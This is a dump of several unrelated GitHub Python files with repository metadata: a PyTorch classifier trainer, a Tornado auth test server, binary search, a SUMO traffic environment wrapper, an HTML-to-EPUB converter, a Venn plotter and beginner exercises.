model_build(model, model_arch, drop_out):\r\n    \r\n    hidden_layers = args.hidden_layers\r\n    ##num_categories = len(train_data.class_to_idx)\r\n    num_categories = len(images_datasets['train'].class_to_idx)\r\n\r\n    for param in model.parameters():\r\n        param.requires_grad = False\r\n\r\n    if (model_arch == 'vgg16'):\r\n        from collections import OrderedDict\r\n        classifier = nn.Sequential(OrderedDict([\r\n            ('fc1', nn.Linear(25088, hidden_layers)),\r\n            ('relu', nn.ReLU()),\r\n            ('dropout', nn.Dropout(drop_out)),\r\n            ('fc2', nn.Linear(hidden_layers,num_categories)),\r\n            ('output', nn.LogSoftmax(dim=1)) \r\n        ]))\r\n    elif (model_arch == 'densenet121'):\r\n        from collections import OrderedDict\r\n        classifier = nn.Sequential(OrderedDict([\r\n            ('fc1', nn.Linear(1024,num_categories)),\r\n            ('relu', nn.ReLU()),\r\n            ('dropout', nn.Dropout(drop_out)),\r\n            ('output', nn.LogSoftmax(dim=1)) \r\n        ]))\r\n    elif (model_arch == 'alexnet'):\r\n        from collections import OrderedDict\r\n        classifier = nn.Sequential(OrderedDict([\r\n            ('fc1', nn.Linear(9216, hidden_layers)),\r\n            ('relu', nn.ReLU()),\r\n            ('dropout', nn.Dropout(drop_out)),\r\n            ('fc2', nn.Linear(hidden_layers,num_categories)),\r\n            ('output', nn.LogSoftmax(dim=1)) \r\n        ]))\r\n    else:\r\n        print('error')\r\n    \r\n    return classifier\r\n\r\n\r\nmodel = model_get(hyper_params['arch'].lower())\r\nclassifier_model = model_build(model, hyper_params['arch'].lower(), hyper_params['drop'])\r\nmodel.classifier = classifier_model\r\nprint('\\narch: ' + hyper_params['arch'] + ' classifier = ')\r\nprint(model.classifier)\r\n\r\n\r\ndef model_train(model, criterion, optimizer, epochs, train_loader, valid_loader, use_gpu):\r\n    device = torch.device(\"cuda\" if use_gpu and torch.cuda.is_available() else \"cpu\")\r\n    model.to(device)\r\n    print_every = 20\r\n    step = 0\r\n    \r\n    for epoch in range(epochs):\r\n        model.train()\r\n        running_loss = 0\r\n        \r\n        for inputs, labels in train_loader:\r\n            step += 1\r\n            inputs, labels = inputs.to(device), labels.to(device)\r\n            \r\n            optimizer.zero_grad()\r\n            \r\n            outputs = model(inputs)\r\n            loss = criterion(outputs, labels)\r\n            loss.backward()\r\n            optimizer.step()\r\n            \r\n            running_loss += 
loss.item()\r\n \r\n if step % print_every == 0:\r\n model.eval()\r\n accuracy = 0\r\n valid_loss = 0\r\n \r\n with torch.no_grad():\r\n for inputs, labels in valid_loader:\r\n inputs, labels = inputs.to(device), labels.to(device)\r\n outputs = model(inputs)\r\n valid_loss += criterion(outputs, labels).item()\r\n ps = torch.exp(outputs)\r\n equality = (labels.data == ps.max(dim=1)[1])\r\n accuracy += equality.type(torch.FloatTensor).mean()\r\n\r\n print(f\"Epoch: {epoch+1}/{epochs}... \"\r\n f\"Training Loss: {running_loss/print_every:.4f}... \"\r\n f\"Validation Loss: {valid_loss/len(valid_loader):.4f}... \"\r\n f\"Validation Accuracy: {accuracy/len(valid_loader):.4f}\")\r\n \r\n running_loss = 0\r\n model.train()\r\n\r\n\r\n\r\ndef accu_check(model, test_load, gpu): \r\n right = 0\r\n total = 0\r\n \r\n model.eval()\r\n \r\n if (gpu == 'GPU'):\r\n model.to('cuda:0')\r\n \r\n with torch.no_grad():\r\n for data in test_load:\r\n images, labels = data\r\n if (gpu == 'GPU'):\r\n images, labels = images.to('cuda'), labels.to('cuda')\r\n op = model(images)\r\n _, predicted = torch.max(op.data, 1)\r\n total += labels.size(0)\r\n right += (predicted == labels).sum().item()\r\n\r\n print('\\nAccuracy: %d %%' % (100 * right / total))\r\n\r\n\r\ncriterion = nn.NLLLoss()\r\nopti = optim.Adam(model.classifier.parameters(), hyper_params['lr'])\r\nmodel_train(model, criterion, opti, hyper_params['epochs'], data_load['train_load'], data_load['valid_load'], hyper_params['gpu'])\r\naccu_check(model, data_load['test_load'], hyper_params['gpu'])\r\n\r\n\r\nmodel.class_to_idx = images_datasets['train'].class_to_idx\r\ncheckpoint = {\r\n 'arch': hyper_params['arch'],\r\n 'class_to_idx': model.class_to_idx, \r\n 'state_dict': model.state_dict(),\r\n 'opti': opti.state_dict(),\r\n 'in_layers': hyper_params['in_layers'],\r\n 'hidden_layers': hyper_params['hidden_layers'],\r\n 'out_layers': hyper_params['out_layers'],\r\n 'learning rate': hyper_params['lr'],\r\n 'dropout': hyper_params['drop'],\r\n 'epochs': hyper_params['epochs'],\r\n 'topk': hyper_params['topk']\r\n}\r\ntorch.save(checkpoint, 'checkpoint.pth')\r\n","repo_name":"Yuktha2708/Image-Classifier-Udacity","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3122376279","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''testserver.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Apr 2018\nLicense: MIT - see the LICENSE file for the full text.\n\n'''\n#############\n## LOGGING ##\n#############\n\nimport logging\n\n\n#############\n## IMPORTS ##\n#############\n\nimport os\nimport os.path\nimport signal\nimport time\nimport sys\nimport socket\nimport json\n\n# this handles async background stuff\nfrom concurrent.futures import ProcessPoolExecutor\n\n# setup signal trapping on SIGINT\ndef recv_sigint(signum, stack):\n '''\n handler function to receive and process a SIGINT\n\n '''\n raise KeyboardInterrupt\n\n\n\n#####################\n## TORNADO IMPORTS ##\n#####################\n\n# experimental, probably will remove at some point\ntry:\n import asyncio\n import uvloop\n asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n IOLOOP_SPEC = 'uvloop'\nexcept Exception as e:\n HAVE_UVLOOP = False\n IOLOOP_SPEC = 'asyncio'\n\nimport tornado.ioloop\nimport tornado.httpserver\nimport tornado.web\nimport tornado.options\nfrom tornado.options import define, options\n\n\n###############################\n### 
APPLICATION SETUP BELOW ###\n###############################\n\nmodpath = os.path.abspath(os.path.dirname(__file__))\n\n# define our commandline options\n\n# the port to serve on\n# testserver will serve on 12500-12519 by default\ndefine('port',\n default=12500,\n help='Run on the given port.',\n type=int)\n\n# the address to listen on\ndefine('serve',\n default='127.0.0.1',\n help='Bind to given address and serve content.',\n type=str)\n\n# whether to run in debugmode or not\ndefine('debugmode',\n default=0,\n help='start up in debug mode if set to 1.',\n type=int)\n\n# number of background threads in the pool executor\ndefine('backgroundworkers',\n default=4,\n help=('number of background workers to use '),\n type=int)\n\n# the template path\ndefine('templatepath',\n default=os.path.abspath(os.path.join(modpath,'templates')),\n help=('Sets the tornado template path.'),\n type=str)\n\n# the assetpath\ndefine('assetpath',\n default=os.path.abspath(os.path.join(modpath,'static')),\n help=('Sets the asset (server images, css, JS) path.'),\n type=str)\n\n# basedir is the directory at the root where all LCC collections are stored this\n# contains subdirs for each collection and a lcc-collections.sqlite file that\n# contains info on all collections.\ndefine('basedir',\n default=os.getcwd(),\n help=('The base directory of the light curve collections.'),\n type=str)\n\n# this overrides the light curve directories that the server uses to find\n# original format light curves.\ndefine('uselcdir',\n default=None,\n help=('This overrides the light curve directories '\n 'that the server uses to find original format '\n 'light curves when it is converting them to the '\n 'LCC CSV format'),\n type=str)\n\n## this tells the testserver about the backend checkplotservers\ndefine('cpaddr',\n default='http://127.0.0.1:5225',\n help=('This tells the lcc-server the address of a '\n 'running checkplotserver instance that might be '\n 'used to get individual object info.'),\n type=str)\n\n## this tells the testserver about the backend authnzerver\ndefine('authnzerver',\n default='http://127.0.0.1:12600',\n help=('This tells the lcc-server the address of '\n 'the local authentication and authorization server.'),\n type=str)\n\n## this tells the testserver about the default session expiry time in days\ndefine('sessionexpiry',\n default=7,\n help=('This tells the lcc-server the session-expiry time in days.'),\n type=int)\n\n\n############\n### MAIN ###\n############\n\ndef main():\n\n # parse the command line\n tornado.options.parse_command_line()\n\n DEBUG = True if options.debugmode == 1 else False\n\n # get a logger\n LOGGER = logging.getLogger(__name__)\n if DEBUG:\n LOGGER.setLevel(logging.DEBUG)\n else:\n LOGGER.setLevel(logging.INFO)\n\n ###########################\n ## DEFINING URL HANDLERS ##\n ###########################\n\n from lccserver.frontend import auth_handlers as ah\n from lccserver.authnzerver import authdb\n\n ###################\n ## SET UP CONFIG ##\n ###################\n\n MAXWORKERS = options.backgroundworkers\n\n # various directories we need\n BASEDIR = os.path.abspath(options.basedir)\n TEMPLATEPATH = os.path.abspath(options.templatepath)\n ASSETPATH = os.path.abspath(options.assetpath)\n\n # get our secret keys\n SESSIONSECRET = authdb.get_secret_token(\n 'LCC_SESSIONSECRET',\n os.path.join(\n BASEDIR,\n '.lccserver.secret'\n ),\n LOGGER\n )\n FERNETSECRET = authdb.get_secret_token(\n 'LCC_FERNETSECRET',\n os.path.join(\n BASEDIR,\n '.lccserver.secret-fernet'\n ),\n LOGGER\n )\n\n 
AUTHNZERVER = options.authnzerver\n SESSION_EXPIRY = options.sessionexpiry\n\n #\n # site specific info\n #\n siteinfojson = os.path.join(BASEDIR, 'site-info.json')\n with open(siteinfojson,'r') as infd:\n SITEINFO = json.load(infd)\n\n # get the email info file if it exists\n if ('email_settings_file' in SITEINFO and\n os.path.exists(os.path.abspath(SITEINFO['email_settings_file']))):\n\n with open(SITEINFO['email_settings_file'],'r') as infd:\n email_settings = json.load(infd)\n\n if email_settings['email_server'] != \"smtp.example.email.server.org\":\n SITEINFO.update(email_settings)\n\n LOGGER.info('email server to use: %s:%s' %\n (email_settings['email_server'],\n email_settings['email_port']))\n LOGGER.info('email server sender to use: %s' %\n email_settings['email_sender'])\n\n else:\n LOGGER.warning('no email server is set up')\n SITEINFO['email_server'] = None\n else:\n LOGGER.warning('no email server is set up')\n SITEINFO['email_server'] = None\n\n\n ####################################\n ## PERSISTENT BACKGROUND EXECUTOR ##\n ####################################\n\n EXECUTOR = ProcessPoolExecutor(MAXWORKERS)\n\n ##################\n ## URL HANDLERS ##\n ##################\n\n HANDLERS = [\n\n #################\n ## BASIC STUFF ##\n #################\n\n # this is the index page\n (r'/',\n ah.IndexHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the login page\n (r'/users/login',\n ah.LoginHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the logout page\n (r'/users/logout',\n ah.LogoutHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the new user page\n (r'/users/new',\n ah.NewUserHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the verification page for verifying email addresses\n (r'/users/verify',\n ah.VerifyUserHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is step 1 page for forgotten passwords\n (r'/users/forgot-password-step1',\n ah.ForgotPassStep1Handler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the verification page for verifying email addresses\n (r'/users/forgot-password-step2',\n ah.ForgotPassStep2Handler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n # this is the verification page for verifying email addresses\n (r'/users/password-change',\n ah.ChangePassHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n\n # this is an example protected page for the user containing their prefs\n (r'/users/home',\n ah.UserHomeHandler,\n {'fernetkey':FERNETSECRET,\n 'executor':EXECUTOR,\n 'authnzerver':AUTHNZERVER,\n 'session_expiry':SESSION_EXPIRY,\n 'siteinfo':SITEINFO}),\n\n ]\n\n ########################\n ## APPLICATION SET UP ##\n ########################\n\n app = tornado.web.Application(\n 
static_path=ASSETPATH,\n handlers=HANDLERS,\n template_path=TEMPLATEPATH,\n static_url_prefix='/static/',\n compress_response=True,\n cookie_secret=SESSIONSECRET,\n xsrf_cookies=True,\n debug=DEBUG,\n login_url='/users/login',\n )\n\n # FIXME: consider using this instead of handlers=HANDLERS above.\n # http://www.tornadoweb.org/en/stable/guide/security.html#dns-rebinding\n # FIXME: how does this work for X-Real-Ip and X-Forwarded-Host?\n # if options.serve == '127.0.0.1':\n # app.add_handlers(r'(localhost|127\\.0\\.0\\.1)', HANDLERS)\n # else:\n # fqdn = socket.getfqdn()\n # ip = options.serve.replace('.','\\.')\n # app.add_handlers(r'({fqdn}|{ip})'.format(fqdn=fqdn,ip=ip), HANDLERS)\n\n # start up the HTTP server and our application. xheaders = True turns on\n # X-Forwarded-For support so we can see the remote IP in the logs\n http_server = tornado.httpserver.HTTPServer(app, xheaders=True)\n\n\n ######################\n ## start the server ##\n ######################\n\n # make sure the port we're going to listen on is ok\n # inspired by how Jupyter notebook does this\n portok = False\n serverport = options.port\n maxtries = 10\n thistry = 0\n while not portok and thistry < maxtries:\n try:\n http_server.listen(serverport, options.serve)\n portok = True\n except socket.error as e:\n LOGGER.warning('%s:%s is already in use, trying port %s' %\n (options.serve, serverport, serverport + 1))\n serverport = serverport + 1\n\n if not portok:\n LOGGER.error('could not find a free port after %s tries, giving up' %\n maxtries)\n sys.exit(1)\n\n LOGGER.info('Started testserver. listening on http://%s:%s' %\n (options.serve, serverport))\n LOGGER.info('Background worker processes: %s, IOLoop in use: %s' %\n (MAXWORKERS, IOLOOP_SPEC))\n LOGGER.info('The current base directory is: %s' % os.path.abspath(BASEDIR))\n\n # register the signal callbacks\n signal.signal(signal.SIGINT,recv_sigint)\n signal.signal(signal.SIGTERM,recv_sigint)\n\n # start the IOLoop and begin serving requests\n try:\n\n tornado.ioloop.IOLoop.instance().start()\n\n except KeyboardInterrupt:\n\n LOGGER.info('received Ctrl-C: shutting down...')\n tornado.ioloop.IOLoop.instance().stop()\n # close down the processpool\n\n EXECUTOR.shutdown()\n time.sleep(2)\n\n# run the server\nif __name__ == '__main__':\n main()\n","repo_name":"waqasbhatti/lcc-server","sub_path":"lccserver/frontend/testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":11855,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"70527735274","text":"\ndef binary_search(a_list, target):\n first = 0\n last = len(a_list) - 1\n found = False\n\n while first <= last and not found:\n mid = (first + last) // 2\n if a_list[mid] == target:\n found = True\n else:\n if a_list[mid] > target:\n last = mid - 1\n else:\n first = mid + 1\n return found\n\n\ndef binary_search_rec(a_list, target):\n if len(a_list) == 0:\n return False\n else:\n mid = len(a_list) // 2\n if a_list[mid] == target:\n return True\n else:\n if a_list[mid] > target:\n return binary_search_rec(a_list[:mid], target)\n else:\n return binary_search_rec(a_list[mid + 1:], target)\n\n \n\n\n\n\ntest_list = [1, 2, 32, 8, 17, 19, 42, 13, 0]\nordered_test_list = sorted(test_list)\nprint(binary_search(ordered_test_list, 3))\nprint(binary_search(ordered_test_list, 13))\n\nprint(binary_search_rec(ordered_test_list, 3))\nprint(binary_search_rec(ordered_test_list, 
13))\n","repo_name":"garigari-kun/til","sub_path":"src/problem_solving/chapter5/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9384881979","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@file environ.py\n@author Allen Woods\n@date 2016-07-29\n@version 16-7-29 下午2:51 ???\nSUMO simulation environment\n\"\"\"\nimport numpy as np\nfrom collections import deque\nfrom debug.logger import timeit\n\n\nclass TrafficSim(object):\n \"\"\"\n Small wrapper for gym atari environments.\n Responsible for preprocessing screens and holding on to a screen buffer\n of size agent_history_length from which environment state\n is constructed.\n \"\"\"\n\n def __init__(self, sumo_env, cross_num=1, cross_status=4,\n agent_history_length=15, thread_label=None):\n self.env = sumo_env\n self.cross_num = cross_num\n self.cross_status = cross_status\n self.agent_history_length = agent_history_length\n self.thread_label = str(thread_label)\n self.tls_actions = sumo_env.actions # Action space is 2**tls_num\n\n # Screen buffer of size AGENT_HISTORY_LENGTH to be able\n # to build state arrays of size [1, AGENT_HISTORY_LENGTH, cross_num, cross_status]\n self.state_buffer = deque()\n self.sumo = None\n self.traci = None\n\n def reset_sumo(self):\n self.sumo =self.env.reset()\n\n def get_initial_state(self, history_length):\n \"\"\"\n Resets SUMO, clears the state buffer\n \"\"\"\n # Clear the state buffer\n self.state_buffer = deque()\n x_t, r_t, terminal, i = self.env.step(self.thread_label)\n self.cross_num = len(self.env.tls)\n self.cross_status = len(self.env.traci_env.directions)\n x_t = self.get_preprocessed_status(x_t)\n # print(x_t)\n s_t = np.stack(([x_t for i in range(history_length)]), axis=0)\n\n for i in range(self.agent_history_length - 1):\n self.state_buffer.append(x_t)\n return s_t\n\n def get_preprocessed_status(self, observation, index='halt'):\n \"\"\"\n Get Status from Traci log\n :param index:\n :param observation: list, each one contain [step, tls_id, direction,\n light_status, halting number, waiting time]\n :return: x_t, np.array, shape=(tls, directions, status);\n For example, in a 3x3 net, shape=(9, 4, 2)\n\n \"\"\"\n if index == 'halt':\n x_index = -2\n elif index == 'wait':\n x_index = -1\n else:\n raise ValueError('Index should be either \\'halt\\' or \\'wait\\'')\n x_t = np.array([x[x_index] for x in observation])\n shape = x_t.shape\n x_t = x_t.reshape((int(shape[0] / self.cross_status), self.cross_status))\n return x_t\n\n def step(self, action_index=None):\n \"\"\"\n Excecutes an action in the sumo environment.\n Builds current state (concatenation of agent_history_length-1 previous frames and current one).\n Pops oldest frame, adds current frame to the state buffer.\n Returns current state.\n \"\"\"\n if action_index == None:\n action = None\n else:\n action = self.tls_actions[action_index]\n x_t1, r_t, terminal, info = self.env.step(action)\n r_t = np.mean(r_t) # !!!!!!Using mean reward of all tls reward!!!!!\n x_t1 = self.get_preprocessed_status(x_t1)\n # print(x_t1.shape)\n s_shape = tuple([self.agent_history_length]) + x_t1.shape\n # print(s_shape)\n previous_frames = np.array(self.state_buffer)\n s_t1 = np.empty(s_shape)\n s_t1[:self.agent_history_length - 1, ...] 
= previous_frames\n s_t1[self.agent_history_length - 1] = x_t1\n\n # Pop the oldest frame, add the current frame to the queue\n self.state_buffer.popleft()\n self.state_buffer.append(x_t1)\n\n return s_t1, r_t, terminal, info\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"allenwoods/parasys","sub_path":"SumoEnv/environ.py","file_name":"environ.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38274876725","text":"import re\nimport subprocess\nfrom dataclasses import asdict, dataclass\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\nfrom typing import List, Optional, Union\n\nfrom bs4 import BeautifulSoup\n\nPREPROCESS_XSLT = \"\"\"\n\n\n\n \n \n \n \n \n \n\n \n

[xsl:stylesheet markup lost in extraction]
\"\"\".strip()\n\nHTML_TEMPLATE = \"\"\"\n[opening HTML boilerplate lost in extraction]\n{}\n[closing HTML boilerplate lost in extraction]\n\"\"\".strip()\n\n\n@dataclass\nclass EPubMetadata:\n\n title: str\n authors: Optional[List[str]] = None\n pubdate: Optional[str] = None\n cover: Optional[Union[Path, str]] = None\n language: str = \"en\"\n tags: Optional[List[str]] = None\n\n book_producer: str = \"https://github.com/LennartKeller/IMSDB_EPub\"\n\n def __post_init__(self):\n if self.tags is not None:\n self.tags = [\"movie-script\"] + self.tags\n\n def to_cli_args(self) -> List[str]:\n cli_args = []\n for field, val in asdict(self).items():\n if val is None:\n continue\n if \"_\" in field:\n field = field.replace(\"_\", \"-\")\n if field == \"authors\":\n val = \"&\".join(val)\n if field == \"tags\":\n val = \", \".join(val)\n cli_args.extend([f\"--{field}\", val])\n return cli_args\n\n\nclass ConversionError(Exception):\n ...\n\n\nclass XSLTError(Exception):\n ...\n\n\ndef sanitize_html(html: str) -> str:\n # Replace spooky newlines\n html = html.strip().replace(\"\\r\", \"\")\n html = re.sub(\"\", \"\", html, flags=re.DOTALL)\n soup = BeautifulSoup(html, features=\"html5lib\")\n # Replace empty elements with br tags\n for e in soup.find_all():\n if len(e.get_text(strip=True)) == 0:\n e.replaceWith(\"<br/>\")\n html = soup.prettify(formatter=lambda string: string)\n return html\n\n\ndef markdown2html(text: str) -> str:\n with NamedTemporaryFile(\"w\", suffix=\".md\") as in_file:\n with NamedTemporaryFile(\"r\", suffix=\".html\") as out_file:\n in_file.write(text)\n in_file.seek(0)\n try:\n _ = subprocess.run([\n \"md-to-html\",\n \"--input\",\n in_file.name,\n \"--output\",\n out_file.name\n ],\n check=True,\n capture_output=True\n )\n except subprocess.CalledProcessError as e:\n raise ConversionError(e.stderr.decode(\"utf-8\"))\n html = out_file.read()\n return html\n\n\ndef md2html(markdown: str) -> str:\n with NamedTemporaryFile(\"w\", suffix=\".md\") as in_file:\n with NamedTemporaryFile(\"r\", suffix=\".html\") as out_file:\n in_file.write(markdown)\n in_file.seek(0)\n try:\n _ = subprocess.run([\n \"pandoc\",\n \"-i\",\n in_file.name,\n \"-o\",\n out_file.name\n ],\n check=True,\n capture_output=True\n )\n except subprocess.CalledProcessError as e:\n raise ConversionError(e.stderr.decode(\"utf-8\"))\n html = out_file.read()\n return html\n\n# def preprocess_html(html: str) -> str:\n# # Insert div to make paragraphs explicit\n# html = sanitize_html(html)\n\n# paragraphs = []\n# for p in re.split(r\"\\n{2,}\", html.strip()):\n# if not \"\".join(p.split()):\n# continue\n# if p.strip() == \"<br/>\" or p == \"<br/>\".strip():\n# paragraphs.append(p)\n\n# else:\n# paragraphs.append(f\"<div>{p}</div>\")\n# html = \"\\n\\n\".join(paragraphs)\n\n# # html = html.replace(\"<pre>\", \"\")\n# # html = html.replace(\"</pre>\", \"\")\n# # html = html.replace(\"<html>\", \"\")\n# # html = html.replace(\"</html>\", \"\")\n# # html = html.replace(\"<head>\", \"\")\n# # html = html.replace(\"/head>\", \"\")\n# # html = html.replace(\"<body>\", \"\")\n# # html = html.replace(\"</body>\", \"\")\n\n# # try:\n# # transform = et.XSLT(et.parse(BytesIO(PREPROCESS_XSLT.encode(\"utf-8\"))))\n# # tree = et.parse(StringIO(html), parser=et.HTMLParser(recover=True))\n# # transformed_tree = transform(tree)\n# # html = et.tostring(transformed_tree).decode(\"utf-8\")\n# # except Exception as e:\n# # raise XSLTError(e)\n# # html = markdown2html(html)\n# return html\n\n\ndef preprocess_html(html: str) -> str:\n html = re.sub(\"\", \"\", html, flags=re.DOTALL)\n html = sanitize_html(html)\n paragraphs = []\n for p in re.split(r\"\\n{2,}\", html.strip()):\n if not \"\".join(p.split()):\n continue\n if p.strip() == \"<br/>\" or p == \"<br/>\".strip():\n paragraphs.append(p)\n\n else:\n paragraphs.append(f\"<div>{p}</div>\")\n\n html = \"\\n\\n\".join(paragraphs)\n\n # Remove tags\n html = html.replace(\"\\n\", \"<br/>\")\n html = html.replace(\"<pre>\", \"\")\n html = html.replace(\"</pre>
    \", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"/head>\", \"\")\n html = html.replace(\"\", \"\")\n html = html.replace(\"\", \"\")\n # Insert content into standardized template\n html = HTML_TEMPLATE.format(html)\n return html\n\n\ndef convert(html: str, out_file: Union[str, Path], metadata: Optional[EPubMetadata] = None) -> None:\n out_file = Path(out_file)\n if out_file.suffix != \".epub\":\n out_file.rename(out_file.with_suffix(\".epub\"))\n\n with NamedTemporaryFile(\"w\", suffix=\".html\") as src_file:\n src_file.write(html)\n src_file.seek(0)\n try:\n args = [\n \"ebook-convert\",\n src_file.name,\n out_file.absolute()\n ]\n if metadata is not None:\n metadata_args = metadata.to_cli_args()\n args += metadata_args\n _ = subprocess.run(\n args=args,\n check=True,\n capture_output=True\n )\n except subprocess.CalledProcessError as e:\n raise ConversionError(e.stderr.decode(\"utf-8\"))\n\n\nif __name__ == \"__main__\":\n import json\n import logging\n\n from tqdm.auto import tqdm\n logger = logging.getLogger()\n\n POSTER_DIR = Path(\"poster\")\n\n EPUB_DIR = Path(\"epub\")\n EPUB_DIR.mkdir(exist_ok=True)\n\n HTML_DIR = Path(\"html\")\n HTML_DIR.mkdir(exist_ok=True)\n\n data = [\n json.loads(line)\n for line in Path(\"data_html.jsonl\").read_text().split(\"\\n\")\n if line.strip()\n ]\n pbar = tqdm(list(sorted(data, key=lambda s: s.get(\"title\"))))\n\n if POSTER_DIR.exists():\n poster_files = list(POSTER_DIR.glob(\"*.jpg\"))\n\n def find_poster(title: str) -> str:\n title = \"_\".join(title.split())\n for file in poster_files:\n if file.stem == title:\n return file.absolute()\n\n for script in pbar:\n title = \" \".join(script[\"title\"].split())\n html = script[\"script\"]\n\n if POSTER_DIR.exists():\n poster_file = find_poster(title)\n\n metadata = EPubMetadata(\n title=title,\n authors=script.get(\"writers\"),\n pubdate=script.get(\"script_date\"),\n cover=poster_file,\n tags=script.get(\"genres\")\n )\n\n (HTML_DIR / f\"BEFORE_{title}.html\").write_text(html)\n pbar.set_description(f\"Processing {title}\")\n try:\n preprocessed_html = preprocess_html(html=html)\n (HTML_DIR / f\"{title}.html\").write_text(preprocessed_html)\n\n convert(\n html=preprocessed_html,\n out_file=EPUB_DIR / f\"{title}.epub\",\n metadata=metadata\n )\n except Exception as e:\n logger.exception(e)\n","repo_name":"LennartKeller/IMSDB_EPub","sub_path":"convert2epub.py","file_name":"convert2epub.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12537330728","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt \nfrom matplotlib_venn import venn3, venn3_circles\nfrom matplotlib_venn import venn2, venn2_circles, venn2_unweighted\n\n\n### Input: 3 species names, 3 separate lists an output file name and a title ###\n### Output: a png file of a weighted venn diagram labeled with species names and a custom title ###\n\n\n# Name list and title parameters\ndef make_venn_diagram(species1, species2, species3, list1, list2, list3, output_name, title):\n\n # Color scheme for venn circles\n colors = ['darkviolet','deepskyblue','blue']\n \n # Generate the diagram with passed in data\n venn_diagram = venn3([set(list1), set(list2), set(list3)], (species1, species2, species3), set_colors = colors)\n\n # Formatting\n plt.title(title)\n \n i = 0\n for text in 
venn_diagram.set_labels:\n text.set_fontweight('bold')\n text.set_fontsize(16)\n text.set_color(colors[i])\n i+=1\n\n for text in venn_diagram.subset_labels:\n text.set_color('white')\n text.set_fontsize(14)\n\n # Output venn diagram to a png image\n plt.savefig(f'{output_name}.png')\n\n\n\ndef main():\n\n import sys # sys.argv is used below, but sys was never imported at module level\n\n species1 = sys.argv[1]\n species2 = sys.argv[2]\n species3 = sys.argv[3]\n\n list1 = sys.argv[4]\n list2 = sys.argv[5]\n list3 = sys.argv[6]\n\n output_name = sys.argv[7]\n title = sys.argv[8]\n\n make_venn_diagram(species1, species2, species3, list1, list2, list3, output_name, title)\n\nif __name__ == '__main__':\n main()\n","repo_name":"jnjahncke/hot-seq-summer","sub_path":"make_venn_diagram.py","file_name":"make_venn_diagram.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22488514980","text":"#!/usr/bin/python3\n\"\"\"Function that checks whether a year is a leap year\"\"\"\naño = int(input(\"enter a year: \"))\ndef año_bisiesto(año):\n if(año % 4 == 0 and año % 100 != 0):\n return True\n elif(año % 4 == 0 and año % 400 == 0):\n return True\n else:\n return False\n\nresultado = año_bisiesto(año)\nprint(resultado)\n\n","repo_name":"ANDRES3021/python","sub_path":"ejercicios_parte5/Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38009072447","text":"#LOOPS\r\n\r\nmy_condition = 0\r\nwhile my_condition < 10:\r\n print(my_condition)\r\n my_condition += 1\r\n\r\nwhile my_condition < 20:\r\n my_condition += 1\r\n if my_condition == 15:\r\n print(\"Stopping execution\")\r\n break\r\n print(my_condition)\r\nprint(\"Execution continues\")\r\n\r\nmy_list = [34, 67, 5, 89, 15]\r\nmy_dict = {\"Nombre\" : \"Marina\", \"Apellido\" : \"Sanchez\", \"Edad\": 20}\r\nfor element in my_list:\r\n print(element)\r\nfor element in list(my_dict.values()):\r\n print(element)\r\nelse:\r\n print(\"The for loop over my dictionary has finished\")\r\n\r\nfor element in my_dict: # stop the loop when the element is \"Edad\"\r\n print(element)\r\n if element == \"Edad\":\r\n break\r\nfor element in my_dict: # skip the rest of the iteration when the element is \"Edad\"\r\n print(element)\r\n if element == \"Edad\":\r\n continue 